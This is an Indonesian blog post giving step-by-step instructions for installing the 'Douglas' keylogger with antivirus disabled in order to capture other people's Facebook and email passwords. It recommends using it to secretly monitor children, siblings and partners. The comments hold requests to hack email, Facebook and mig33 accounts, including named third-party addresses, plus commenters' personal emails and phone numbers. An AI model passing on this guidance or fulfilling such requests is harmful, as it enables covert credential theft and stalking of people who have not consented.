Cara mengetahui katasandi passwoard orang lain

Diposkan oleh Masterz Datz

LINK DOWNLOAD Cara mengetahui katasandi passwoard orang lain SUDAH DI PERBAIKI  feb 2013 ^_^

Cara mengetahui katasandi passwoard orang lain dengan menggunakan keyloggerdouglas_en..
Software ini kusus merekam katasandi/passwoard aktivitas keyboard..
Yang ingin coba silahkan,,

Tutorialnya sbb:
Pertama matikan semua antivirus dan download keylogger douglas Click ini
lalu extrack here dengan winrar,,
contoh gambar di bawah:
Buka folder yang di extrack,,
click kanan pada file instal dan open,,
instal seperti biasa dan masukan passwoard apa aja..
selesai instal coba sobat buka www.facebook.com maka apa yang di ketik keyboard akan terekam oleh keylogger ini,, dan keluar dari fb..
maka email dan katasandi yang sobat ketikan terrekam oleh software ini..
Lalu cari folder yang di extrack tadi,, click 2 kali pada readinfo dan masukan passwoard tadi lalu ok..
Lihat di bawah di samping start (C:\WINDO... click (C:\WINDO... Lihat paswooardnya dan tinggal copas (copy paste) selesai..

Inilah Cara mengetahui katasandi passwoard orang lain
Jangan salah di pergunakan,, keylogger douglas ini cocok untuk mengawasi anak,, adik dan pacar sobat..

Download software hack facebook

Description: Cara mengetahui katasandi passwoard orang lain Rating: 4.5 Reviewer: Masterz Datz - ItemReviewed: Cara mengetahui katasandi passwoard orang lain
Bila butuh bantuan segera contact saya via sms 085-215-040-847 atau tinggalkan komentar di bawah postingan ini..


{ 27 komentar... read them below or add one }

Anonim mengatakan...

terime kasih banyak gan ane termasuk hacker pemula jadi blog ni dapat mbantu ane

Masterz Datz mengatakan...

yupz sama2,,
Maaf baru di blz..

Anonim mengatakan...

Gan mau tanya ni.
Ni dipakainya kalau ada yang login pake komputer yang terinstal software ini. atau kalau kita login dengan password yang salah. apakah sandinya akan tetap terlihat.
terimakasih.

Masterz Datz mengatakan...

Software ini untuk merekam aktivitas keyboard,,
jadi salah dan benar tetap terekam..

mambo mengatakan...
Komentar ini telah dihapus oleh penulis.
mambo mengatakan...

bos ane butuh sofware hack id mig33 punya gak bos ?? ane udah sms ke nope kayanya gak aktiv bos

Masterz Datz mengatakan...

Nanti saya akan membantu anda,,
tapi skrg saya lagi sibuk dgn pekerjaan..
cara hack id mig33 ini saya tidak akan membuat postingan,,
nanti saya send di nmor mambo..

raven mengatakan...

Nice inpoh ßяσ.. Btw, boleh req app hack email or FB? Kalo Ъќ keberatan tlg di kirim ke lovevagina0@gmail.com

Many tks

Masterz Datz mengatakan...

^_^

Ria mengatakan...

gan tlong app bwt hach email......soalnya email bpak saya dhack orang, beliau kbngungan soalnya data2 kantor ada disitu,tlong send ksni yaa......
loves9600@gmail.com

Masterz Datz mengatakan...

Buat yg suka ngehack pake software ini "Pro Facebook Hack v 2.0 By Anonymous & Zmaim"
tutorialnya cari di youtube!!

Anonim mengatakan...

gan bantu lag dong bkinin hack fb yang paten

Masterz Datz mengatakan...

Wach kalau jarak dekat,, gunakan ini aja..

linkkhusus.rudi@blogger.com mengatakan...

mantep ih..

afriansyah mengatakan...

omm..

file nya kok banyak yang di hapus..

link nya lagi donk..

Masterz Datz mengatakan...

Link sudah hidup lagi ^_^

hasan familly mengatakan...

bos saya punya akun yang di tutup udah lama di tutup cuman pengen di bukalagi udahbanyak trik namun gagal bisa ngak bantu ngembaliin akun fb atau bisa kasih saya software jegud
ini email nya elasaidah@yahoo.com...atau kirimi saya sofware lewat imail saya hasanwirayuda58@yahoo.com

Anonim mengatakan...

gan ane lupa pass ny....
gimana cara nya gan supaya bisa digunakan lg
mkasih
abhinaya789@rocketmail.com

djancok njaran mengatakan...

gan tlong ksih aplikasi bwt nge hack id mig33... mkasihh,,

Anonim mengatakan...

gan link nya kok ngga bisa tulisannya Unknown network error.

Anonim mengatakan...

link nya jancookk

Yusup UJ mengatakan...

gan cara ngumpetin red info gimana trsss kalo komputer di reset atau di restart douglas nya ilang gk

A. Rahman mengatakan...

master datz
sy ingin mengetahui kata sandi email ini
email: een.aeni.90@yahoo.com
mohon tolong minta sandinya ya:
kalo dah ada sandinya
kirim sandinya ke no saya...
Ni nomor ya..0817757047

ir wady mengatakan...

sob bolh mnta tolng gx..

ir wady mengatakan...

sob bolh mnta tolng gx..

ir wady mengatakan...

sob bolh mnta tolng gx..

Anonim mengatakan...

master datz
sy ingin mengetahui kata sandi email ini
email: masdani@outlook.com
mohon tolong minta sandinya ya:
kalo dah ada sandinya
kirim via sms sandinya ke no saya 085322854745

Poskan Komentar

KOMENTAR ATAU MASUKAN SANGATLAH BERMANFAAT UNTUK SAYA,,
LUANGKAN WAKTU UNTUK BERKOMENTAR DI BLOG SEDERHANA INI..